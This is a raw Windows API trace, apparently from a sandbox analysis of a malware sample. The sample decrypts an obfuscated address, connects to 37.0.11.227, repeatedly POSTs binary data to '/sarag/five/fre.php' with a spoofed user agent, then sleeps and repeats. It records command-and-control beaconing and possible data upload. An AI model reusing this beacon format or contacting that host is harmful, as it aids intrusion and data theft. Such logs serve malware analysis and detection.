LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.096] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0206.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.096] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0206.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.097] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0206.097] GetProcessHeap () returned 0x690000 [0206.098] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0206.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.099] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0206.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.100] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0206.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.102] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0206.102] GetProcessHeap () returned 0x690000 [0206.102] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0206.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.103] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0206.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.104] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0206.104] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.105] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0206.105] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.105] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0206.105] GetProcessHeap () returned 0x690000 [0206.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0206.106] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0206.106] GetProcessHeap () returned 0x690000 [0206.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0206.106] GetProcessHeap () returned 0x690000 [0206.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0206.106] GetProcessHeap () returned 0x690000 [0206.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0206.108] GetProcessHeap () returned 0x690000 [0206.108] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0206.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.109] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0206.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.119] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0206.125] GetProcessHeap () returned 0x690000 [0206.125] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0206.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.126] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0206.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.127] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0206.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.130] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0206.130] GetProcessHeap () returned 0x690000 [0206.130] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0206.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.132] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0206.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.133] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0206.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.134] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0206.134] GetProcessHeap () returned 0x690000 [0206.134] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0206.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.135] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0206.136] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.136] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0206.137] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.137] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0206.138] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.138] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0206.138] GetProcessHeap () returned 0x690000 [0206.138] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0206.138] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2c90*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea48*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0206.141] GetProcessHeap () returned 0x690000 [0206.141] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0206.141] socket (af=2, type=1, protocol=6) returned 0x494 [0206.142] connect (s=0x494, name=0x6aea48*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0206.170] FreeAddrInfoW (pAddrInfo=0x6b2c90*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea48*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0206.170] GetProcessHeap () returned 0x690000 [0206.170] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0206.170] GetProcessHeap () returned 0x690000 [0206.170] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0206.170] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0206.171] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0206.171] GetProcessHeap () returned 0x690000 [0206.171] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0206.171] GetProcessHeap () returned 0x690000 [0206.172] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0206.172] GetProcessHeap () returned 0x690000 [0206.174] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0206.174] GetProcessHeap () returned 0x690000 [0206.174] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0206.175] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0206.177] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0206.177] GetProcessHeap () returned 0x690000 [0206.177] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6a91a8 [0206.177] GetProcessHeap () returned 0x690000 [0206.177] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0206.177] send (s=0x494, buf=0x6a91a8*, len=242, flags=0) returned 242 [0206.178] send (s=0x494, buf=0x6aba40*, len=159, flags=0) returned 159 [0206.178] GetProcessHeap () returned 0x690000 [0206.178] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0206.178] recv (in: s=0x494, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0206.259] GetProcessHeap () returned 0x690000 [0206.260] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a91a8 | out: hHeap=0x690000) returned 1 [0206.260] GetProcessHeap () returned 0x690000 [0206.261] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0206.262] GetProcessHeap () returned 0x690000 [0206.262] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0206.262] GetProcessHeap () returned 0x690000 [0206.262] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0206.263] closesocket (s=0x494) returned 0 [0206.263] GetProcessHeap () returned 0x690000 [0206.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0206.263] GetProcessHeap () returned 0x690000 [0206.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0206.264] GetProcessHeap () returned 0x690000 [0206.264] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0206.264] GetProcessHeap () returned 0x690000 [0206.264] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0206.264] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x928) returned 0x494 [0206.266] Sleep (dwMilliseconds=0xea60) [0206.268] GetProcessHeap () returned 0x690000 [0206.268] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0206.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.269] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0206.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.278] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0206.288] GetProcessHeap () returned 0x690000 [0206.288] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0206.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.290] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0206.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.291] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0206.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.292] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0206.292] GetProcessHeap () returned 0x690000 [0206.293] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0206.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.297] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0206.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.298] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0206.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.299] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0206.299] GetProcessHeap () returned 0x690000 [0206.299] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0206.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.300] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0206.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.302] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0206.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.308] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0206.309] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.309] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0206.309] GetProcessHeap () returned 0x690000 [0206.309] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0206.309] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0206.309] GetProcessHeap () returned 0x690000 [0206.310] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0206.310] GetProcessHeap () returned 0x690000 [0206.310] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0206.310] GetProcessHeap () returned 0x690000 [0206.311] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0206.311] GetProcessHeap () returned 0x690000 [0206.311] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0206.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.313] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0206.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.323] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0206.331] GetProcessHeap () returned 0x690000 [0206.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0206.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.332] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0206.333] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.333] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0206.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.334] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0206.334] GetProcessHeap () returned 0x690000 [0206.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0206.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.335] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0206.336] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.336] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0206.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.339] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0206.339] GetProcessHeap () returned 0x690000 [0206.339] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0206.340] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.340] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0206.341] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.341] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0206.342] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.342] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0206.343] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.344] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0206.344] GetProcessHeap () returned 0x690000 [0206.344] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0206.344] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0206.344] GetProcessHeap () returned 0x690000 [0206.344] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0206.344] socket (af=2, type=1, protocol=6) returned 0x204 [0206.344] connect (s=0x204, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0206.364] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0206.364] GetProcessHeap () returned 0x690000 [0206.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0206.364] GetProcessHeap () returned 0x690000 [0206.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0206.364] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0206.365] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0206.365] GetProcessHeap () returned 0x690000 [0206.365] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0206.365] GetProcessHeap () returned 0x690000 [0206.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0206.366] GetProcessHeap () returned 0x690000 [0206.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0206.366] GetProcessHeap () returned 0x690000 [0206.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0206.367] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0206.367] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0206.367] GetProcessHeap () returned 0x690000 [0206.367] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0206.367] GetProcessHeap () returned 0x690000 [0206.368] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0206.368] send (s=0x204, buf=0x6ab500*, len=242, flags=0) returned 242 [0206.368] send (s=0x204, buf=0x6aba40*, len=159, flags=0) returned 159 [0206.368] GetProcessHeap () returned 0x690000 [0206.368] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0206.368] recv (in: s=0x204, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0206.501] GetProcessHeap () returned 0x690000 [0206.501] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0206.501] GetProcessHeap () returned 0x690000 [0206.502] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0206.502] GetProcessHeap () returned 0x690000 [0206.502] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0206.502] GetProcessHeap () returned 0x690000 [0206.502] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0206.503] closesocket (s=0x204) returned 0 [0206.503] GetProcessHeap () returned 0x690000 [0206.503] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0206.503] GetProcessHeap () returned 0x690000 [0206.505] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0206.505] GetProcessHeap () returned 0x690000 [0206.505] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0206.505] GetProcessHeap () returned 0x690000 [0206.505] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0206.506] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x3bc) returned 0x204 [0206.507] Sleep (dwMilliseconds=0xea60) [0206.509] GetProcessHeap () returned 0x690000 [0206.509] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0206.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.510] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0206.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.517] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0206.527] GetProcessHeap () returned 0x690000 [0206.527] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0206.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.528] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0206.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.530] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0206.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.833] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0206.833] GetProcessHeap () returned 0x690000 [0206.833] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0206.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.835] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0206.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.836] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0206.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.837] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 